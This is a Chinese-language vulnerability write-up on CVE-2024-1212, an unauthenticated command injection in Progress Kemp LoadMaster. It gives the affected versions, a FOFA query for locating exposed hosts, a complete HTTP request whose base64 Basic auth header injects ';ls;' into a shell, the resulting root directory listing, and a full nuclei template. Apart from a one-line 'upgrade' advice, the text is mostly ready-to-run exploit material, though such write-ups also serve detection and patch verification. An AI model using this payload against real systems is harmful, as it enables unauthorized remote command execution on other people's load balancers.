CVE-2024-1212

发布于2024年5月7日2025年7月19日作者:cve-20

CVE-2024-1212

原创 fgz AI与网安 2024-05-07 07:10

免
责
申
明
：本文内容为学习笔记分享，仅供技术学习参考，请勿用作违法用途，任何个人和组织利用此文所提供的信息而造成的直接或间接后果和损失，均由使用者本人负责，与作者无关！！！

—

漏洞名称

Progress Kemp LoadMaster 远程命令执行漏洞

—

漏洞影响

LoadMaster <= 7.2.59.2 (GA)

LoadMaster<=7.2.54.8 (LTSF)

LoadMaster <= 7.2.48.10 (LTS)

—

漏洞描述

Progress Kemp LoadMaster是一款负载均衡和应用交付控制器。
LoadMaster /access/set接口处存在
远程命令执行漏洞，
攻击者可以通过未经身份验证的方式访问LoadMaster管理接口，从而执行任意系统命令。这可能导致系统遭受严重的安全威胁。

—

FOFA搜索语句

body="LoadMaster"

—

漏洞复现

向靶场发送如下数据包，其中
JztsczsnOmRvZXNub3RtYXR0ZXI=
是’;ls;’:doesnotmatter的base64编码

GET /access/set?param=enableapi&value=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.1
Connection: close
Accept: */*
Accept-Language: en
Authorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=
Accept-Encoding: gzip

响应内容如下

HTTP/1.1 200 OK
Connection: close
Content-Type: text/html
Date: Mon, 06 May 2024 05:58:52 GMT

azurelinuxagent
bin
cgroup
dev
etc
initial_setup.sh
lib
lib64
lost+found
mnt
one4net
openssl
proc
root
sbin
sks
sys
tmp
user
usr
var
sh: : command not found
Status: 401 Unauthorized
Content-Type: text/html
WWW-Authenticate: Basic realm=user

<!DOCTYPE html>
<HTML><HEAD>
<TITLE>401 Unauthorized</TITLE>
</HEAD><BODY>
<H1>Permission Denied</H1>
No permission to access document<P><HR></BODY></HTML>

漏洞复现成功

—

nuclei poc

poc文件内容如下

id: CVE-2024-1212

info:
  name: Progress Kemp LoadMaster - Command Injection
  author: DhiyaneshDK
  severity: critical
  description: |
    Unauthenticated remote attackers can access the system through the LoadMaster management interface, enabling arbitrary system command execution.
  reference:
    - https://rhinosecuritylabs.com/research/cve-2024-1212unauthenticated-command-injection-in-progress-kemp-loadmaster
    - https://support.kemptechnologies.com/hc/en-us/articles/23878931058445-LoadMaster-Security-Vulnerability-CVE-2024-1212
    - https://support.kemptechnologies.com/hc/en-us/articles/24325072850573-Release-Notice-LMOS-7-2-59-2-7-2-54-8-7-2-48-10-CVE-2024-1212
    - https://nvd.nist.gov/vuln/detail/CVE-2024-1212
    - https://freeloadbalancer.com/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10
    cve-id: CVE-2024-1212
    cwe-id: CWE-78
    epss-score: 0.00721
    epss-percentile: 0.802
  metadata:
    verified: true
    max-request: 1
    shodan-query: html:"LoadMaster"
  tags: cve,cve2024,progress,rce,loadmaster

http:
  - method: GET
    path:
      - "{{BaseURL}}/access/set?param=enableapi&value=1"
    headers:
      Authorization: "Basic JztsczsnOmRvZXNub3RtYXR0ZXI="

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "bin"
          - "mnt"
          - "WWW-Authenticate: Basic"
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a0047304502203c9fc29ea41909ec2bef545f7a4e29b165e9e11f14bade221b2ffc058c2c9051022100e36e3225d79c6a7ba704b8766c5603e5b2822e539c707a4f2a1a17052f2dfc47:922c64590222798bb761d5b6d8e72950

—

修复建议

升级到最新版本。

CVE-2024-1212

CVE-2024-1212

近期文章

近期评论

归档

分类